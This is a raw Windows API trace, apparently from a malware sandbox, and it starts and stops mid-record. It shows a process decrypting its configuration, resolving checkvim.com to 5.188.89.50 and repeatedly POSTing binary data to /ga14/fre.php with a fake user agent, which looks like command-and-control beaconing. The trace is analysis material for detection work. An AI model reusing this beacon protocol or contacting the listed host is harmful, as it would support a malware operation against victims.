GetProcessHeap () returned 0x840000 [0213.477] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0213.477] recv (in: s=0x2a4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0214.126] GetProcessHeap () returned 0x840000 [0214.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0214.126] GetProcessHeap () returned 0x840000 [0214.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0214.126] GetProcessHeap () returned 0x840000 [0214.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0214.126] GetProcessHeap () returned 0x840000 [0214.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0214.126] closesocket (s=0x2a4) returned 0 [0215.604] GetProcessHeap () returned 0x840000 [0215.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0215.604] GetProcessHeap () returned 0x840000 [0215.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0215.604] GetProcessHeap () returned 0x840000 [0215.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0215.604] GetProcessHeap () returned 0x840000 [0215.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0215.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1290) returned 0x2a4 [0215.606] Sleep (dwMilliseconds=0xea60) [0215.608] GetProcessHeap () returned 0x840000 [0215.608] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0215.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.609] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0215.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.644] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f578) returned 1 [0215.711] GetProcessHeap () returned 0x840000 [0215.711] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0215.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.712] CryptImportKey (in: hProv=0x86f578, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0215.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.713] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0215.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.715] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.715] GetProcessHeap () returned 0x840000 [0215.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0215.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.722] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0215.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.723] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0215.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.724] CryptReleaseContext (hProv=0x86f578, dwFlags=0x0) returned 1 [0215.724] GetProcessHeap () returned 0x840000 [0215.724] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0215.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.725] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.729] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.729] GetProcessHeap () returned 0x840000 [0215.729] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0215.729] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0215.763] GetProcessHeap () returned 0x840000 [0215.763] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0215.763] GetProcessHeap () returned 0x840000 [0215.763] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0215.763] GetProcessHeap () returned 0x840000 [0215.763] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0215.763] GetProcessHeap () returned 0x840000 [0215.763] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0215.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.765] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0215.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.773] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f578) returned 1 [0215.783] GetProcessHeap () returned 0x840000 [0215.783] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0215.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.784] CryptImportKey (in: hProv=0x86f578, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0215.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.785] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0215.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.786] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.786] GetProcessHeap () returned 0x840000 [0215.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0215.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.787] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0215.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.788] CryptDestroyKey (hKey=0x87e270) returned 1 [0215.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0215.790] CryptReleaseContext (hProv=0x86f578, dwFlags=0x0) returned 1 [0215.790] GetProcessHeap () returned 0x840000 [0215.790] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0215.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.791] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0215.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.792] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0215.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.793] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0215.793] GetProcessHeap () returned 0x840000 [0215.793] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0215.793] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0215.801] GetProcessHeap () returned 0x840000 [0215.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0215.801] socket (af=2, type=1, protocol=6) returned 0x2a8 [0215.801] connect (s=0x2a8, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0215.874] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0215.874] GetProcessHeap () returned 0x840000 [0215.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0215.874] GetProcessHeap () returned 0x840000 [0215.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0215.875] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0215.875] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0215.875] GetProcessHeap () returned 0x840000 [0215.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0215.876] GetProcessHeap () returned 0x840000 [0215.876] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0215.876] GetProcessHeap () returned 0x840000 [0215.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f950 [0215.876] GetProcessHeap () returned 0x840000 [0215.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0215.876] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0215.877] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0215.877] GetProcessHeap () returned 0x840000 [0215.877] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0215.877] GetProcessHeap () returned 0x840000 [0215.881] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0215.883] send (s=0x2a8, buf=0x873a58*, len=237, flags=0) returned 237 [0215.893] send (s=0x2a8, buf=0x87eb58*, len=159, flags=0) returned 159 [0215.893] GetProcessHeap () returned 0x840000 [0215.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0215.893] recv (in: s=0x2a8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0216.236] GetProcessHeap () returned 0x840000 [0216.236] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0216.236] GetProcessHeap () returned 0x840000 [0216.236] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0216.236] GetProcessHeap () returned 0x840000 [0216.236] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0216.236] GetProcessHeap () returned 0x840000 [0216.236] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0216.236] closesocket (s=0x2a8) returned 0 [0216.237] GetProcessHeap () returned 0x840000 [0216.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0216.237] GetProcessHeap () returned 0x840000 [0216.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0216.237] GetProcessHeap () returned 0x840000 [0216.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0216.237] GetProcessHeap () returned 0x840000 [0216.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0216.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xea0) returned 0x2a8 [0216.266] Sleep (dwMilliseconds=0xea60) [0216.267] GetProcessHeap () returned 0x840000 [0216.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0216.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.269] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0216.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.282] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0216.288] GetProcessHeap () returned 0x840000 [0216.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0216.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.289] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0216.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.290] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0216.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.291] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.291] GetProcessHeap () returned 0x840000 [0216.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0216.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.292] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0216.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.293] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0216.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.294] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0216.294] GetProcessHeap () returned 0x840000 [0216.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0216.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.295] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.296] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.297] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.298] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.298] GetProcessHeap () returned 0x840000 [0216.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0216.298] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0216.298] GetProcessHeap () returned 0x840000 [0216.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0216.298] GetProcessHeap () returned 0x840000 [0216.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0216.298] GetProcessHeap () returned 0x840000 [0216.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0216.298] GetProcessHeap () returned 0x840000 [0216.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0216.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.300] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0216.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.306] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0216.313] GetProcessHeap () returned 0x840000 [0216.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0216.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.314] CryptImportKey (in: hProv=0x86f798, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0216.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.315] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0216.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.315] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.316] GetProcessHeap () returned 0x840000 [0216.316] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0216.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.317] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0216.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.317] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0216.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0216.318] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0216.319] GetProcessHeap () returned 0x840000 [0216.319] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0216.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.321] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0216.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.322] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0216.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.323] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0216.323] GetProcessHeap () returned 0x840000 [0216.323] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0216.323] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0216.332] GetProcessHeap () returned 0x840000 [0216.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0216.332] socket (af=2, type=1, protocol=6) returned 0x2ac [0216.332] connect (s=0x2ac, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0216.406] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0216.406] GetProcessHeap () returned 0x840000 [0216.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0216.406] GetProcessHeap () returned 0x840000 [0216.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0216.407] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0216.407] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0216.407] GetProcessHeap () returned 0x840000 [0216.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0216.408] GetProcessHeap () returned 0x840000 [0216.408] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0216.408] GetProcessHeap () returned 0x840000 [0216.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0216.408] GetProcessHeap () returned 0x840000 [0216.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0216.408] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0216.409] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0216.409] GetProcessHeap () returned 0x840000 [0216.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0216.409] GetProcessHeap () returned 0x840000 [0216.410] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0216.410] send (s=0x2ac, buf=0x873a58*, len=237, flags=0) returned 237 [0216.410] send (s=0x2ac, buf=0x87eb58*, len=159, flags=0) returned 159 [0216.410] GetProcessHeap () returned 0x840000 [0216.410] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0216.410] recv (in: s=0x2ac, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0216.768] GetProcessHeap () returned 0x840000 [0216.768] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0216.768] GetProcessHeap () returned 0x840000 [0216.768] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0216.769] closesocket (s=0x2ac) returned 0 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0216.769] GetProcessHeap () returned 0x840000 [0216.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0216.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xee4) returned 